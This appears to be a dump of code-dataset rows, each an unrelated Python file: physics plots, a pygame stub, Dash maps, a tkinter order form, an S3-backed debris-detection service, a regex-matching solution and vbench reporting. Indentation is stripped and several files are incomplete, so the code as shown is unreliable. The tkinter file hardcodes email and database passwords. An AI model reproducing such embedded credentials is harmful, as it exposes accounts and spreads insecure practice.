phi, phidot, info = cm.solver_DDP(t, phi0, phidot0, gamma, w0, beta)
# Plot Stuff
fig1 = plt.figure(1)
ax1a = fig1.add_subplot(2,1,1)
ax1a.set_title("Chapter 12 Question 14")
# Plots solution of DDP
for i in range(0,info[1]):
ax1a.plot(t,phi[:,i],'-',label="$\phi_1(0)$={:}".format(phi0))
# Other plot details (legend, etc)
ax1a.axhline(y=0, color='k')
ax1a.set_ylabel(r'$\phi_1$ (rad)')
ax1a.legend(loc='upper left')
ax1a.yaxis.set_major_formatter(FuncFormatter(lambda val,pos: '{:.0g}$\pi$'.format(val/pi) if val != 0 else '0'))
ax1a.yaxis.set_major_locator(MultipleLocator(base=pi))
ax1a.set_xlim([0, tmax])
# Solve DDP equation
phi0 = 1e-5 # Initial angle (rad)
phi2, phidot2, info2 = cm.solver_DDP(t, phi0, phidot0, gamma, w0, beta)
# Additional subplot
ax1b = fig1.add_subplot(2,1,2)
# Plots solution
for i in range(0,info2[1]):
ax1b.plot(t,phi2[:,i],'-',label="$\phi_2(0)$={:}".format(phi0))
# Other subplot details (legend, etc)
ax1b.axhline(y=0, color='k')
ax1b.set_ylabel(r'$\phi_2$ (rad)')
ax1b.legend(loc='upper left')
ax1b.yaxis.set_major_formatter(FuncFormatter(lambda val,pos: '{:.0g}$\pi$'.format(val/pi) if val != 0 else '0'))
ax1b.yaxis.set_major_locator(MultipleLocator(base=pi))
ax1b.set_xlim([0, tmax])
ax1b.set_xlabel("Time (s)")
# Supplemental plot
fig2 = plt.figure(2)
plt.title("Chapter 12 Question 14")
ax2a = fig2.add_subplot(1,1,1)
# Plot log of absolute difference in phi
ax2a.plot(t,log(abs(phi2[:,0]-phi[:,0])),'-b')
# Other plot details (labels, etc)
ax2a.axhline(y=0,ls=':', color='k')
ax2a.set_ylabel(r'$log(|\Delta\phi|)$')
ax2a.set_xlabel('Time (s)')
ax2a.set_xlim([0, tmax])
plt.show()
|
991,138 | c10f5ced9089bb8858ab1daf56727b74df65fdb6 | import pygame
from pygame.locals import *
import time
import random
from pygame import gfxdraw
class Point(object):
""" creating point class, to determine location of all our stuff
"""
def __init__(self, screen_size, x, y):
self.x = x
self.y = y
def pos(self):
return self.x, self.y
def update(self):
class Nodes(object):
def __init__(self,screen_size):
self.screen_y = screen_size[1]
self.screen_x = screen_size[0]
self.node_list_x = []
self.node_list_y = []
def matrix(self):
self.screen_x/100
class View(object):
def __init__(self, screen_size, model):
# set screen size to bigger display--allow more space for school to move
self.screen = pygame.display.set_mode((1920,1080))
# fill screen as black
self.screen.fill(pygame.Color('black'))
def update(self, model):
self.screen.fill(pygame.Color('black'))
if __name__ == '__main__':
try:
pygame.quit()
except:
pass
pygame.init()
frame_rate = 25
screen_size = (1920, 1800)
background = pygame.display.set_mode(screen_size)
running = True
while running:
for event in pygame.event.get():
if event.type == QUIT:
running = False
controller.handle_event(event, model)
model.update()
view.draw(model)
time.sleep(1/frame_rate)
pygame.quit()
|
991,139 | e453e4cd1fd722d610d4eec9fd17413de9e1fd89 | import math
num=math.sqrt(16)
area=math.pi * radius ** 2
c = math.hypot(a,b) |
991,140 | f927fb59f40caa196ef22d217fc8ca5dcc93c0b2 | #!/usr/bin/python
#\file func_in_func2.py
#\brief certain python script
#\author Akihiko Yamaguchi, info@akihikoy.net
#\version 0.1
#\date Jan.31, 2018
class TTest(object):
def __init__(self):
self.x= 101
def Run(self):
def RunInRun1():
print 'x is',self.x
def RunInRun2(self):
print 'x is',self.x
RunInRun1()
RunInRun2(self)
if __name__=='__main__':
t= TTest()
t.Run()
|
991,141 | b372ead839e59e3351b129d29eb20ddd1c1c0d2d | # Source: https://community.plot.ly/t/python-dash-examples-with-scattergeo/7018/2
# Source: https://plot.ly/python/scatter-plots-on-maps/
import dash
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd
df = pd.read_csv('https://raw.githubusercontent.com/plotly/datasets/master/2011_february_us_airport_traffic.csv')
df.head()
df['text'] = df['airport'] + '' + df['city'] + ', ' + df['state'] + '' + 'Arrivals: ' + df['cnt'].astype(str)
scl = [ [0,"rgb(5, 10, 172)"],[0.35,"rgb(40, 60, 190)"],[0.5,"rgb(70, 100, 245)"],\
[0.6,"rgb(90, 120, 245)"],[0.7,"rgb(106, 137, 247)"],[1,"rgb(220, 220, 220)"] ]
data = [ dict(
type = 'scattergeo',
locationmode = 'USA-states',
lon = df['long'],
lat = df['lat'],
text = df['text'],
mode = 'markers',
marker = dict(
size = 8,
opacity = 0.8,
reversescale = True,
autocolorscale = False,
symbol = 'square',
line = dict(
width=1,
color='rgba(102, 102, 102)'
),
colorscale = scl,
cmin = 0,
color = df['cnt'],
cmax = df['cnt'].max(),
colorbar=dict(
title="Incoming flightsFebruary 2011"
)
))]
layout = dict(
title = 'Most trafficked US airports<br>(Hover for airport names)',
colorbar = True,
geo = dict(
scope='usa',
projection=dict( type='albers usa' ),
showland = True,
landcolor = "rgb(250, 250, 250)",
subunitcolor = "rgb(217, 217, 217)",
countrycolor = "rgb(217, 217, 217)",
countrywidth = 0.5,
subunitwidth = 0.5
),
)
fig = dict( data=data, layout=layout )
#########
df2 = pd.read_csv('https://raw.githubusercontent.com/plotly/datasets/master/2015_06_30_precipitation.csv')
scl2 = [0,"rgb(150,0,90)"],[0.125,"rgb(0, 0, 200)"],[0.25,"rgb(0, 25, 255)"],\
[0.375,"rgb(0, 152, 255)"],[0.5,"rgb(44, 255, 150)"],[0.625,"rgb(151, 255, 0)"],\
[0.75,"rgb(255, 234, 0)"],[0.875,"rgb(255, 111, 0)"],[1,"rgb(255, 0, 0)"]
data2 = [ dict(
lat = df2['Lat'],
lon = df2['Lon'],
text = df2['Globvalue'].astype(str) + ' inches',
marker = dict(
color = df2['Globvalue'],
colorscale = scl2,
reversescale = True,
opacity = 0.7,
size = 2,
colorbar = dict(
thickness = 10,
titleside = "right",
outlinecolor = "rgba(68, 68, 68, 0)",
ticks = "outside",
ticklen = 3,
showticksuffix = "last",
ticksuffix = " inches",
dtick = 0.1
),
),
type = 'scattergeo'
) ]
layout2 = dict(
geo = dict(
scope = 'north america',
showland = True,
landcolor = "rgb(212, 212, 212)",
subunitcolor = "rgb(255, 255, 255)",
countrycolor = "rgb(255, 255, 255)",
showlakes = True,
lakecolor = "rgb(255, 255, 255)",
showsubunits = True,
showcountries = True,
resolution = 50,
projection = dict(
type = 'conic conformal',
rotation = dict(
lon = -100
)
),
lonaxis = dict(
showgrid = True,
gridwidth = 0.5,
range= [ -140.0, -55.0 ],
dtick = 5
),
lataxis = dict (
showgrid = True,
gridwidth = 0.5,
range= [ 20.0, 60.0 ],
dtick = 5
)
),
title = 'US Precipitation 06-30-2015<br>Source: <a href="http://water.weather.gov/precip/">NOAA</a>',
)
fig2 = dict( data=data2, layout=layout2 )
########
app = dash.Dash(__name__)
app.layout = html.Div([
dcc.Graph(id='graph', figure=fig),
dcc.Graph(id='graph2', figure=fig2),
])
if __name__ == '__main__':
app.run_server(debug=True) |
991,142 | 266f6ad35a6ae131072613aa9cb7a139d8f804d2 | import tkinter as tk
from _datetime import datetime
import yagmail
from tkinter import ttk
from tkinter import messagebox
import Colors as Col
import DataBaseOperation
Color = Col.ColoursMainWindow()
class MakeOrder:
def __init__(self, master, *args):
self.Make_Order = tk.Frame(master, bg=Color.WidgetBackground)
self.Make_Order.place(x=0, y=0, height=620, width=850)
self.conf = tk.BooleanVar()
self.conf.set(False)
ttk.Style().configure('green/black.TCheckbutton', foreground='blue',
background=Color.WidgetBackground, font=("Helvetica", 12))
self.Confirmation = ttk.Checkbutton(self.Make_Order, text="I accept the terms and conditions of orders ",
style='green/black.TCheckbutton', variable=self.conf)
self.Confirmation.place(height=40, width=400, x=15, y=520)
self.BOrder = tk.Button(self.Make_Order, text='Make Order', font=14, bg='#0052cc',
fg=Color.WidgetForegrounds, command=lambda: self.process_order())
self.BOrder.place(height=40, width=100, x=730, y=520)
# Label
self.Order_Title = tk.Label(self.Make_Order, text='Order Management',
fg=Color.WidgetForegrounds, bg=Color.WidgetBackground,
font=("Helvetica", 20), anchor='w')
self.Order_Title.place(height=55, width=630, x=15, y=0)
self.OrderT = tk.Label(self.Make_Order,
text='Write an order, put your items with quantity and links that you want to order:',
anchor='w',
font=("Helvetica", 12), bg=Color.WidgetBackground)
self.OrderT.place(height=55, width=520, x=15, y=60)
self.SepOrd = ttk.Separator(self.Make_Order, orient='horizontal')
self.SepOrd.place(width=820, x=12.5, y=500)
self.lName_of_the_Order = tk.Label(self.Make_Order, text='Name of the order:', anchor='w',
bg=Color.WidgetBackground,
font=("Helvetica", 12))
self.lName_of_the_Order.place(height=60, width=160, x=15, y=100)
# Enters
self.elName_of_the_Order = tk.Text(self.Make_Order)
self.elName_of_the_Order.place(height=20, width=650, x=180, y=120)
self.eOrder = tk.Text(self.Make_Order)
self.eOrder.place(height=320, width=815, x=15, y=160)
self.when = datetime.now()
def process_order(self):
self.check_order()
self.send_email()
self.order_to_database()
tk.messagebox.showinfo("Info", "Order was sent correctly")
def check_order(self):
check = self.conf.get()
if check:
self.Tutul = self.elName_of_the_Order.get(1.0, "end-1c")
self.Zawartosc = self.eOrder.get(1.0, "end-1c")
self.elName_of_the_Order.delete('1.0', 'end')
self.eOrder.delete('1.0', 'end')
elif not check:
tk.messagebox.showerror("Error", "You must accept the terms of the orders")
def send_email(self):
receiver = "krzysiu.w@spoko.pl"
Message = self.Zawartosc
yag = yagmail.SMTP("krzysiekpython@gmail.com", password="krzysiek123")
yag.send(
to=receiver,
subject="App_Order",
contents=Message,
)
def order_to_database(self):
User = 'Krzysiek'
Details = "Tak" #self.eOrder.get(1.0, tk.END)
Title = "Tak" #self.elName_of_the_Order.get(1.0, tk.END)
DataBaseOperation.ConnectDatabase.__init__(self, host='localhost', user='root', password='KrzysiekmySql12', database="sql-kurs")
DataBaseOperation.ConnectDatabase._open(self)
DataBaseOperation.ConnectDatabase.insert_make_order(self, user_h=User, when_h=self.when, status_h='', order_h='', order_title=self.Tutul, order_details=self.Zawartosc)
DataBaseOperation.ConnectDatabase._close(self)
|
991,143 | c7084f3ca6f554f58d4ca29bf7917a721ceadb96 | matrix = [[0, 1, 1, 2],
[0, 5, 0, 0],
[2, 0, 3, 3]]
result=zip(*matrix)
sum=0
for i in result:
for j in i:
if j == 0:
break
sum+=j
print sum |
991,144 | fc800dbd150b9a59171e64586957cf72aa9bda49 | import numpy as np
import matplotlib.pyplot as plt
def pause_plot():
fig, ax = plt.subplots(1, 1)
n = 1000
dx = 1/n
dt = 1/n
c = 0.4
x = np.arange(n)/n
u = np.zeros(n)
for i in range(n):
if i < n//10:
u[i + n // 2] = i/n
elif i < n//10 * 2:
u[i + n//2] = 0.2 - i/n
u2 = np.sin(x * 8*np.pi)*0.1
for i in range(n):
if i < n * 7//8:
u2[i] = 0
#u = u + u2
lines, = ax.plot(x, u)
pre_u = u
k = dt*dt*c/dx/dx
u_range = max(-u.min(), u.max())
ax.set_ylim((-u_range, u_range))
while True:
for i in range(10):
u_x = np.convolve([1, -2, 1], u, mode='same')
u_x[0] = 0
u_x[-1] = 0
next_u = 2*u - pre_u + k * u_x
pre_u = u
u = next_u
lines.set_data(x, u)
ax.set_xlim((x.min(), x.max()))
plt.pause(0.01)
if __name__ == "__main__":
pause_plot()
|
991,145 | 9835f60ae3192a2b7198e626e7de1f1bc2dfb8c4 | #!/usr/bin/env python
#_*_ coding:utf-8 _*_
from selenium import webdriver
browser = webdriver.Firefox()
browser.get('http://localhost:8000')
assert 'Django' in browser.title
|
991,146 | ec76228a6ca56a1afb5a0c33f290f19e35d49220 | S, T = input().split()
A, B = map(int, input().split())
U = input()
print("{} {}".format(A - 1, B) if S == U else "{} {}".format(A, B - 1))
|
991,147 | 0d8fca966d285bdc51e54d428b13f69761400d76 | t = int(input())
while t > 0:
n = int(input())
arr = list(map(int,input().split()))
l = []
yol = arr[n-1]
l.append(yol)
for i in range(n-2,-1,-1):
if arr[i] >= yol:
l.append(arr[i])
yol = max(yol,arr[i])
l = l[::-1]
for i in range(len(l)):
print(l[i],end=' ')
print()
t -= 1 |
991,148 | 7be3a49a0050ef86e7e373f9f0ae4a802d8282c1 | from keras.applications import inception_v3,imagenet_utils
from keras_retinanet import models
from keras_retinanet.utils.image import read_image_bgr, preprocess_image, resize_image
from keras_retinanet.utils.visualization import draw_box, draw_caption
from keras_retinanet.utils.colors import label_color
import cv2
import numpy as np
import json
import base64
import logging
import urllib.request
from io import BytesIO
from PIL import Image, ImageDraw
import pandas as pd
from wtforms import Form
from wtforms import ValidationError
from flask_wtf.file import FileField
from werkzeug.datastructures import CombinedMultiDict
from wtforms import Form
from os import path
import sys
import tempfile
from urllib.request import Request, urlopen
from io import StringIO
from datetime import datetime
import os
import boto3
import requests
content_types = {'jpg': 'image/jpeg',
'jpeg': 'image/jpeg',
'png': 'image/png'}
extensions = sorted(content_types.keys())
model = None
#+=================== Model related =========================
version = 'v3'
label_path = "/tmp/labels_{}.csv".format(version)
label_df = pd.read_csv(label_path,names=['label','id'])
label_df
label_lookup = label_df.set_index('id').T.to_dict('records')[0]
label_lookup
if 'heroku' in os.environ and os.environ['heroku']:
s3_client = boto3.client('s3', aws_access_key_id=os.environ['S3_KEY'], aws_secret_access_key=os.environ['S3_secret'])
s3_resource = boto3.resource('s3', aws_access_key_id=os.environ['S3_KEY'], aws_secret_access_key=os.environ['S3_secret'])
else:
boto3.setup_default_session(profile_name='hawaii')
s3_client = boto3.client('s3')
s3_resource = boto3.resource('s3')
bucket_name = 'hawaii-marine-debris'
version='v3'
def load_label_lookup():
label_path = "/tmp/labels_{}.csv".format(version)
label_df = pd.read_csv(label_path,names=['label','id'])
label_lookup = label_df.set_index('id').T.to_dict('records')[0]
return label_lookup
def load_debris_model():
global model
if model is None:
# model =inception_v3.InceptionV3()
# model.compile(optimizer='adam', loss='categorical_crossentropy')
model_path = "/tmp/debris_model_v3_10_6.h5"
model = models.load_model(model_path, backbone_name='resnet50')
return model
#just to get labels
def detect_objects(image):
detected_objects = []
image = preprocess_image(image)
global model
if model is None:
model_path = "/tmp/debris_model_v3_10_6.h5"
model = models.load_model(model_path, backbone_name='resnet50')
boxes, scores, labels = model.predict_on_batch(np.expand_dims(image, axis=0))
detected_label =set()
for box, score, label in zip(boxes[0], scores[0], labels[0]):
#only shows the highest confidence box
if label in detected_label:
continue
detected_label.add(label)
if score < 0.15:
break
color = label_color(label)
b = box.astype(int)
detected_objects.append({'x1':b[0], 'y1':b[1], 'x2': b[2], 'y2':b[3],'label':label, 'label_name': label_lookup[label], 'score':float(score)})
return detected_objects
def backup_to_s3(image_path):
ts = datetime.now().strftime("%Y-%m-%d-%H")
filename= path.basename(image_path).lower().replace(" ", "_")
extension ="jpg" #guess for now
s3_filepath = "images/from_app/external/{}_{}.{}".format(filename, ts,extension)
s3_client.upload_file(image_path, bucket_name, s3_filepath)
return s3_filepath
def store_lat_long(s3_key, latitude,longtitude):
row= {
"image_s3_key": s3_key,
"lat": latitude,
"long":longtitude
}
req_body = {
"type":"insert",
"args":{"table":{"name":"image_debris_location","schema":"public"},
"objects":
[row],
"returning":["id","image_s3_key"]}}
r = requests.post('https://mapping-debris.herokuapp.com/v1/query',
headers = {'user-agent': 'my-app/0.0.1',
'X-Hasura-Access-Key':os.environ['HASURA_KEY']},
data = json.dumps(req_body))
# def store_lat_long(s3_key, latitude,longtitude):
# query = """
# mutation insert_image_debris_location($input: image_debris_location_insert_input!])
# {
# insert_image_debris_location(input: $input) {
# id
# }
# }
# """
# graphql_query = {
# "query":query,
# "operationName": "insert_image_debris_location",
# "variables":json.dumps(variables)
# }
# r = requests.post('https://mapping-debris.herokuapp.com/v1alpha1/graphql',
# headers = {'user-agent': 'my-app/0.0.1',
# 'X-Hasura-Access-Key':os.environ['HASURA_KEY']},
# data = graphql_query)
# return r
def backup(image_path, latitude, longtitude):
s3_path = backup_to_s3(image_path)
try:
latitude = float(latitude)
except:
latitude= None
try:
longtitude = float(longtitude)
except:
longtitude= None
store_lat_long(s3_path, latitude, longtitude)
def detect_marine_objects(image_path, latitude, longtitude):
objects_points_detected_so_far = []
backup(image_path, latitude, longtitude)
print("backed up image")
image = Image.open(image_path).convert('RGB')
image_array = im_to_im_array(image)
preprocessed_image = preprocess_image(image_array)
model = load_debris_model()
boxes, scores, labels = model.predict_on_batch(np.expand_dims(preprocessed_image, axis=0))
# image.thumbnail((480, 480), Image.ANTIALIAS)
result = {}
new_images = {}
debris_count = {}
result['original'] = encode_image(image.copy())
all_obj_image = image.copy()
for box, score, label in zip(boxes[0], scores[0], labels[0]):
if score < 0.15: continue
color = tuple(label_color(label))
b = box.astype(int)
points = {'x1':b[0], 'y1':b[1], 'x2': b[2], 'y2':b[3]}
if len(objects_points_detected_so_far)>0:
max_overlap = max([get_iou(points,v) for v in objects_points_detected_so_far])
if max_overlap>0.2:
continue
cls = label
if cls not in new_images.keys():
new_images[cls] = image.copy()
debris_count[cls]=1
else:
debris_count[cls]+=1
draw_bounding_box_on_image(new_images[cls], box,color=color)
draw_bounding_box_on_image(all_obj_image, box,color=color)
objects_points_detected_so_far.append(points)
result['all'] = encode_image(all_obj_image)
result['summary'] = {}
result['color'] = {}
for cls, new_image in new_images.items():
category = label_lookup[cls]
result[category] = encode_image(new_image)
result['summary'][category] = debris_count[cls]
result['color'][category] = tuple(label_color(cls))
result['summary']['all'] = sum(debris_count.values())
# import pdb;pdb.set_trace()
# <td><hr style="height:1px;border-top:1px solid {{'#%02x%02x%02x' % result['color']['Buoys'] }}" /></td>
#also calculate total number of debris, and counts by type of debris
return result
# =================== Image related =========================
def preprocess_img(img,target_size=(600,600)):
if (img.shape[2] == 4):
img = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)
img = cv2.resize(img,target_size)
img = np.divide(img,255.)
img = np.subtract(img,0.5)
img = np.multiply(img,2.)
return img
def load_im_from_url(url):
requested_url = urlopen(Request(url,headers={'User-Agent': 'Mozilla/5.0'}))
image_array = np.asarray(bytearray(requested_url.read()), dtype=np.uint8)
print (image_array.shape)
print (image_array)
image_array = cv2.imdecode(image_array, -1)
print (image_array.shape)
return image_array
def load_im_from_system(url):
image_url = url.split(',')[1]
image_url = image_url.replace(" ", "+")
image_array = base64.b64decode(image_url)
im = Image.open(BytesIO(image_array))
image = np.asarray(im.convert('RGB'))
return image[:, :, ::-1].copy()
def predict(img):
img=preprocess_img(img)
# print (img.shape)
global model
if model is None:
# model =inception_v3.InceptionV3()
# model.compile(optimizer='adam', loss='categorical_crossentropy')
model_path = "/tmp/debris_model_v3_10_6.h5"
model = models.load_model(model_path, backbone_name='resnet50')
preds = model.predict_on_batch(np.array([img]))
return imagenet_utils.decode_predictions(preds)
def load_image_from_url(url):
with urllib.request.urlopen(url) as url:
f = BytesIO(url.read())
image = np.asarray(Image.open(f).convert('RGB'))
return image[:, :, ::-1].copy()
return None
def draw_bounding_box_on_image(image, box, color='red', thickness=4):
draw = ImageDraw.Draw(image)
im_width, im_height = image.size
# ymin, xmin, ymax, xmax = box
# (left, right, top, bottom) = (xmin * im_width, xmax * im_width,
# ymin * im_height, ymax * im_height)
# x1':b[0], 'y1':b[1], 'x2': b[2], 'y2':b[3]
(left, top, right, bottom) = box
draw.line([(left, top), (left, bottom), (right, bottom),
(right, top), (left, top)], width=thickness, fill=color)
def encode_image(image):
image_buffer = BytesIO()
image.save(image_buffer, format='PNG')
imgstr = 'data:image/png;base64,{:s}'.format(base64.b64encode(image_buffer.getvalue()).decode())
return imgstr
def is_image():
def _is_image(form, field):
if not field.data:
raise ValidationError()
elif field.data.filename.split('.')[-1].lower() not in extensions:
raise ValidationError()
return _is_image
def im_to_im_array(rgb_im):
image = np.asarray(rgb_im)
return image[:, :, ::-1].copy()
#==================== Coordinates related ===================
def get_iou(bb1, bb2):
"""
Calculate the Intersection over Union (IoU) of two bounding boxes.
Parameters
----------
bb1 : dict
Keys: {'x1', 'x2', 'y1', 'y2'}
The (x1, y1) position is at the top left corner,
the (x2, y2) position is at the bottom right corner
bb2 : dict
Keys: {'x1', 'x2', 'y1', 'y2'}
The (x, y) position is at the top left corner,
the (x2, y2) position is at the bottom right corner
Returns
-------
float
in [0, 1]
"""
assert bb1['x1'] <= bb1['x2']
assert bb1['y1'] <= bb1['y2']
assert bb2['x1'] <= bb2['x2']
assert bb2['y1'] <= bb2['y2']
# determine the coordinates of the intersection rectangle
x_left = max(bb1['x1'], bb2['x1'])
y_top = max(bb1['y1'], bb2['y1'])
x_right = min(bb1['x2'], bb2['x2'])
y_bottom = min(bb1['y2'], bb2['y2'])
if x_right < x_left or y_bottom < y_top:
return 0.0
# The intersection of two axis-aligned bounding boxes is always an
# axis-aligned bounding box
intersection_area = (x_right - x_left) * (y_bottom - y_top)
# compute the area of both AABBs
bb1_area = (bb1['x2'] - bb1['x1']) * (bb1['y2'] - bb1['y1'])
bb2_area = (bb2['x2'] - bb2['x1']) * (bb2['y2'] - bb2['y1'])
# compute the intersection over union by taking the intersection
# area and dividing it by the sum of prediction + ground-truth
# areas - the interesection area
iou = intersection_area / float(bb1_area + bb2_area - intersection_area)
assert iou >= 0.0
assert iou <= 1.0
return iou
return model
#image url to try:
#image file to try: /Users/yutakahosoai/project/data/object_detection/non-aerial-images/clean_up_beach_view.jpg
#test 1
# from PIL import Image
# import io
# image = Image.open("/Users/yutakahosoai/project/data/object_detection/non-aerial-images/clean_up_beach_view.jpg")
# image_buffer = io.BytesIO()
# image.save(image_buffer, format='PNG')
# imgstr = 'data:image/png;base64,{:s}'.format(
# base64.b64encode(image_buffer.getvalue()))
|
991,149 | 6d5850567bd31c683fb2ebbf41c6a19d8d8bea8b | Implement regular expression matching with support for '.' and '*'.
'.' Matches any single character.
'*' Matches zero or more of the preceding element.
The matching should cover the entire input string (not partial).
The function prototype should be:
bool isMatch(const char *s, const char *p)
Some examples:
isMatch("aa","a") → false
isMatch("aa","aa") → true
isMatch("aaa","aa") → false
isMatch("aa", "a*") → true
isMatch("aa", ".*") → true
isMatch("ab", ".*") → true
isMatch("aab", "c*a*b") → true
class Solution:
# @return a boolean
def isMatch(self, s, p):
lengthp = len(p)
lengths = len(s)
dp = [[ False for i in xrange(lengthp+1)] for j in xrange(lengths+1)]
dp[0][0] = True
for i in xrange(lengths+1):
for j in xrange(1, lengthp+1):
if p[j-1] != '.' and p[j-1] != '*':
if i > 0:
dp[i][j] = dp[i-1][j-1] and s[i-1] == p[j-1]
elif p[j-1] == '.':
if i > 0:
dp[i][j] = dp[i-1][j-1]
elif p[j-1] == '*':
dp[i][j] = dp[i][j-1] or dp[i][j-2]
if i > 0:
dp[i][j] = dp[i][j-1] or dp[i][j-2] or (dp[i-1][j] and (s[i-1] == p[j-2] or p[j-2] == '.'))
return dp[lengths][lengthp]
'''
* state: ```dp[i][j]``` 表示```s[0:i-1]```是否能和 ```p[0:j-1]```匹配
* initialize: ``` dp[0][0] = True ```
* function:
dp[i][j] = dp[i-1][j-1] and s[i-1][j-1] if p[j-1] != '.' and p[j-1] != '*'
dp[i-1][j-1] if p[j-1] == '.'
dp[i][j-1] or dp[i][j-2] if p[j-1] == '*' 匹配0个或者1个元素
匹配0个元素,即消去p[j-2],此时p[0: j-1] = p[0: j-3]
匹配1个元素,此时p[0: j-1] = p[0: j-2]
dp[i-1][j] and (s[i-1] = p [j-2] or p[j-2] == '.')
* answer: ```dp[M][N]```
* Reference: [Leetcode artical](http://articles.leetcode.com/2011/09/regular-expression-matching.html)
* [Good Analysis] (http://bangbingsyb.blogspot.com/2014/11/leetcode-regular-expression-matching.html)
[Recursion Answer](http://blog.csdn.net/fightforyourdream/article/details/17717873)
[Yu's Garden](http://www.cnblogs.com/yuzhangcmu/p/4105529.html)
'''
|
991,150 | 5493ed84a57455f985d28c80777bf9e2dc10db68 | import xml.etree.ElementTree as ET
import uuid
import httplib
import logging
import json
import urlparse
import boto.s3 as s3
import s3etag
import common
logger = logging.getLogger('httpxml_to_s3')
def httpxml_to_s3(http_url,
s3_url,
region='eu-west-1',
profile_name=None,
xml_preprocessor=lambda s: s):
def inner(fn_inner):
return sync_to_bucket(s3_url, region, profile_name)(from_xml(http_url)(fn_inner))
return inner;
def sync_to_bucket(s3_url,
region='eu-west-1',
profile_name=None):
"""
Decorator function configuring function
xml_preprocessor - If some preprocessing needs to be done on the xml as
a string a lambda can be sent in. Defaults to the
identity function
"""
parsed_s3_url = urlparse.urlparse(s3_url);
bucket_name = parsed_s3_url.hostname;
key_prefix = parsed_s3_url.path;
if key_prefix[0] == '/':
key_prefix = key_prefix[1:]
if key_prefix[-1] != '/':
key_prefix = key_prefix + '/'
def inner(fn_inner):
"""
Decorator function function sent in should be having signature
func(None,None, XmlDoc) and should yield JSON document one for
each file that should be persisted to S3
"""
def handler(event, context):
"""
The AWS Lambda Entry Point
"""
s3conn = s3.connect_to_region(region, profile_name=profile_name)
bucket = s3conn.get_bucket(bucket_name)
# Use a map to track keys that are no longer in the feed, used for deletion
remaining_keys = { key.name : True for key in bucket.list(prefix=key_prefix)}
logger.debug("Existing keys in bucket\n%s", '\n'.join(remaining_keys));
for id, json_data in fn_inner():
key_name = key_prefix + str(uuid.uuid5(uuid.NAMESPACE_URL, id.encode('utf-8')))
# Key found, delete it from cleanup map
if key_name in remaining_keys:
del remaining_keys[key_name]
string_data = json.dumps(json_data)
s3_object = bucket.get_key(key_name)
if s3_object == None:
key = bucket.new_key(key_name);
key.set_contents_from_string(string_data)
logger.info('Creating:\ts3://%s/%s', bucket_name, key_name)
logger.debug(string_data)
else:
if s3_object.etag[1:len(s3_object.etag)-1] != s3etag.from_string(string_data):
logger.info('Updating:\ts3://%s/%s', bucket_name, key_name)
logger.debug(string_data)
s3_object.set_contents_from_string(string_data)
else:
logger.info('Same:\ts3://%s/%s', bucket_name, key_name);
logger.debug(string_data)
# Remvoe remaining keys from the bucket to allow for cleanup
for key in remaining_keys:
logger.info('Removing:\ts3://%s/%s', bucket_name, key);
bucket.delete_key(key);
logger.info('Done');
return handler
return inner
def from_xml(url):
def inner(fn_inner):
def handler():
input_xml = ET.fromstring(common.get_page(url))
return fn_inner(input_xml)
return handler
return inner
|
991,151 | 90388ac07b0b5ebe99a1579516625c65005aa547 | from django import forms
from django.contrib.auth.models import User
from bootstrap_toolkit.widgets import BootstrapDateInput,BootstrapTextInput,BootstrapUneditableInput
class LoginForm(forms.Form):
username = forms.CharField(
required=True,
lable="用户名",
error_messages={'requirede':'请输入用户名'},
widget=forms.TextInput(
attrs={
'placeholder':"用户名",
}
),
)
password = forms.CharField(
required=True,
lable="密码",
error_messages={'required':'请输入密码'},
widget=forms.TextInput(
attrs={
'placeholder':"密码",
}
),
)
|
991,152 | 42d097bcfcc71579410c20df639a6119182844ac | #emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
#ex: set sts=4 ts=4 sw=4 noet:
"""Functionality to ease generation of vbench reports
"""
__copyright__ = '2012-2013 Wes McKinney, Yaroslav Halchenko'
__license__ = 'MIT'
import os
from .analysis import ConsistentlyWorse
import logging
log = logging.getLogger('vb.reports')
def group_benchmarks_by_module(benchmarks):
benchmarks_by_module = {}
for b in benchmarks:
module_name = b.module_name or "orphan"
if not module_name in benchmarks_by_module:
benchmarks_by_module[module_name] = []
benchmarks_by_module[module_name].append(b)
return benchmarks_by_module
def generate_rst_files(benchmarks, dbpath, outpath, description=""):
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
vb_path = os.path.join(outpath, 'vbench')
fig_base_path = os.path.join(vb_path, 'figures')
if not os.path.exists(vb_path):
log.info('Creating %s' % vb_path)
os.makedirs(vb_path)
if not os.path.exists(fig_base_path):
log.info('Creating %s' % fig_base_path)
os.makedirs(fig_base_path)
log.info("Generating rst files for %d benchmarks" % (len(benchmarks)))
for bmk in benchmarks:
log.debug('Generating rst file for %s' % bmk.name)
rst_path = os.path.join(outpath, 'vbench/%s.rst' % bmk.name)
fig_full_path = os.path.join(fig_base_path, '%s.png' % bmk.name)
# make the figure
plt.figure(figsize=(10, 6))
ax = plt.gca()
bmk.plot(dbpath, ax=ax)
start, end = ax.get_xlim()
plt.xlim([start - 30, end + 30])
plt.savefig(fig_full_path, bbox_inches='tight')
plt.close('all')
fig_rel_path = 'vbench/figures/%s.png' % bmk.name
rst_text = bmk.to_rst(image_path=fig_rel_path)
with open(rst_path, 'w') as f:
f.write(rst_text)
with open(os.path.join(outpath, 'index.rst'), 'w') as f:
print >> f, """
Performance Benchmarks
======================
These historical benchmark graphs were produced with `vbench
<http://github.com/pydata/vbench>`__.
%(description)s
.. toctree::
:hidden:
:maxdepth: 3
""" % locals()
# group benchmarks by module there belonged to
benchmarks_by_module = group_benchmarks_by_module(benchmarks)
for modname, mod_bmks in sorted(benchmarks_by_module.items()):
print >> f, ' vb_%s' % modname
modpath = os.path.join(outpath, 'vb_%s.rst' % modname)
with open(modpath, 'w') as mh:
header = '%s\n%s\n\n' % (modname, '=' * len(modname))
print >> mh, header
for bmk in mod_bmks:
print >> mh, ".. _%s:\n" % bmk.get_rst_label()
print >> mh, bmk.name
print >> mh, '-' * len(bmk.name)
print >> mh, '.. include:: vbench/%s.rst\n' % bmk.name
def generate_rst_analysis(benchmarks, dbpath, outpath, gh_repo=None,
checks=[ConsistentlyWorse(10, 0.01)]):
"""Provides basic analysis of benchmarks and generates a report listing the offenders
"""
with open(os.path.join(outpath, 'analysis.rst'), 'w') as f:
print >> f, """
Benchmarks Performance Analysis
===============================
"""
all_res = []
for b in benchmarks:
# basic analysis: find
for check in checks:
results = b.get_results(dbpath)
res = check(results)
if res:
res['benchmark'] = ":ref:`%s`" % b.get_rst_label()
